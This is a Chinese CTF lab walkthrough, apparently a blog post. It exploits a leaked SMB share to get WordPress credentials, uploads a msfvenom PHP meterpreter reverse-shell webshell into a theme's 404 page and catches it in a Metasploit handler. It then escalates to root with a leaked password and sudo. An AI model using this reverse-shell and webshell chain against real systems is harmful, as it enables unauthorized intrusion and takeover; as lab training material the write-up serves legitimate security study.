zoukankan      html  css  js  c++  java
  • CTF-SMB信息泄露详细版

    SMB信息泄露

    攻击机ip:192.168.1.2

    靶机ip:192.168.1.3

    首先先介绍下SMB服务。以下来至百度

    SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。

    SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

    SMB协议,计算机可以访问网络资源,下载对应的资源文件

    首先我们先扫描端口。 nmap -sV 靶场ip

    发现http端口开启,那么我们用dirb命令扫描下网站目录,发现了两个登陆页面

    phpadmin和wp-admin

    那么我们就继续挖掘信息寻找登陆账号和密码。我们发现SMB端口打开,那么我们使用命令

    smbclient -L 靶场ip   ---查看SMB有哪些开放得服务资源

    提示输入密码,那么我们使用弱口令或者空口令尝试,发现空口令可以成功登陆

    最后我们发现得三个资源中只有share$能进行访问,那么我们就使用命令smbclient '\靶场ipshare$'进去

    发现有三个.txt文件,我们逐一下载(使用get下载)

    打开deets.txt发现有个密码,我们把它记下,或许后面有用

    我们此时找到了一个密码,那还需要用户名,我们在继续在share$里面找找。想起我们有一个登陆页面是wp-admin,那再share$里面不是有个类似得wordpress嘛,我们cd进入试试,这一试不得了啊,发现了不少好多西

    看见了配置文件,那么我们直接把它get下来,然后查看发现了username和password!

    那我们直接拿这两个再wp-admin登陆页面登陆。哎!登陆成功了!进入了网站的后台!

    既然进入了后台,那么我们肯定回本能的想留下个webshell,那么开搞!

    使用msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

    这条命令在我们攻击机的桌面上形成一个shell.php的webshell。然后我们打开网站后台的Appearance目录下的editor,在404页面上传webshell代码

    然后打开metalspolit,选择hardya模块启动监听

    msf > use exploit/multi/handler

    msf exploit(handler) > set payload php/meterpreter/reverse_tcp

    msf exploit(handler) > set lhost 攻击机IP地址

    msf exploit(handler) > set lport 4444

    msf exploit(handler) > run

    然后通过固定路径http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php 获取反弹shell(看网页回显哪个固定路径就使用哪个)

    反弹成功,但是我们还需优化会话

    使用命令python -c "import pty; pty.spawn('/bin/bash')"进行优化即可

    然后使用命令cat /etc/paawd 查询用户名,然后发现home目录下有个togie用户,su togie去切换到togie,,su togie。提示需要密码,我们想起之前deets.txt文件中的12345这个密码,输入,成功!然后我们还需要提权到root,那么我们使用命令 sudo su进行提权,成功!

    既然拿到了froot权限,那岂不是为所欲为了,后面的查找flag.txt我就不写啦!

  • 相关阅读:
    java基础:9.2 接口implements,Comparable,Cloneable接口
    java基础:9.1 抽象类
    java基础:9.4 web爬虫
    java基础:6.0 ArrayList
    java基础:9.3 从web上读取数据
    java基础:12.1 文本I/O(一)
    3.2 FPGA 配置电路/主模式 从模式 JTAG模式
    谷歌浏览器查看HTTP协议
    MIME类型说明
    常见的响应码说明
  • 原文地址:https://www.cnblogs.com/Hbbbb/p/12616619.html
Copyright © 2011-2022 走看看